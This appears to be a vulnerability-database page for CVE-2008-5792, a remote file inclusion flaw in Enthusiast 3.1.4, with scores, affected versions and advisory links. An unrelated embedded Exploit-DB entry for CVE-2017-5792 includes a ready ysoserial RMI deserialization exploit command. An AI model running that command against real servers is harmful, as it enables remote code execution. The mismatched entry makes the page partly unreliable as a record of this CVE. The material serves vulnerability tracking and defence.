CVE-2008-5792
published 2008-12-31CVE-2008-5792: PHP remote file inclusion vulnerability in show_joined.php in Indiscripts Enthusiast 3.1.4, and possibly earlier, allows remote attackers to execute arbitrary…
PriorityP339medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.57%
83.2th percentile
PHP remote file inclusion vulnerability in show_joined.php in Indiscripts Enthusiast 3.1.4, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the path parameter. NOTE: the researcher also points out the analogous directory traversal issue.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| indisguise | indiscripts_enthusiast | <= 3.1.4 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HPE iMC 7.3 - RMI Java Deserialization
exploitdb·2018-01-30·CVSS 9.8
CVE-2017-5792 [CRITICAL] HPE iMC 7.3 - RMI Java Deserialization
HPE iMC 7.3 - RMI Java Deserialization
---
# Exploit Title: HPE iMC 7.3 Java RMI Registry Deserialization RCE Vulnerability
# Date: 01-28-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.hpe.com
# Software Link: https://h10145.www1.hpe.com/Downloads/DownloadSoftware.aspx?SoftwareReleaseUId=19068&ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535&SaidNumber=
# Version: iMC PLAT v7.3 (E0504) Standard
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-5792
# See Also: http://zerodayinitiative.com/advisories/ZDI-18-137/
# note that this PoC will launch calc.exe
$ java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.1.100 21195 CommonsBeanutils1 calc.exe
Exploit-DB
Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion
exploitdb·2008-11-08
CVE-2008-5792 Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion
Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion
---
########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: Enthusiast 3 Remote Code Execution
# Vendor: http://scripts.indisguise.org/enthusiast/
# Bug: File Inclusion
# Vulnerable Version: 3.1.4 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_57.htm
###################################################################
####################
- Description:
####################
Enthusiast is a full-featured member listing collective management script. It is geared towards fanlisting owners who own multiple fanlistings, but easily
customizable for other types of listings as well?cliq
No writeups or analysis indexed.
http://secunia.com/advisories/32628http://securityreason.com/securityalert/4853http://www.bugreport.ir/index_57.htmhttp://www.securityfocus.com/archive/1/498161/100/0/threadedhttp://www.securityfocus.com/bid/32205http://www.vupen.com/english/advisories/2008/3073https://exchange.xforce.ibmcloud.com/vulnerabilities/46476https://www.exploit-db.com/exploits/7059http://secunia.com/advisories/32628http://securityreason.com/securityalert/4853http://www.bugreport.ir/index_57.htmhttp://www.securityfocus.com/archive/1/498161/100/0/threadedhttp://www.securityfocus.com/bid/32205http://www.vupen.com/english/advisories/2008/3073https://exchange.xforce.ibmcloud.com/vulnerabilities/46476https://www.exploit-db.com/exploits/7059
2008-12-31
Published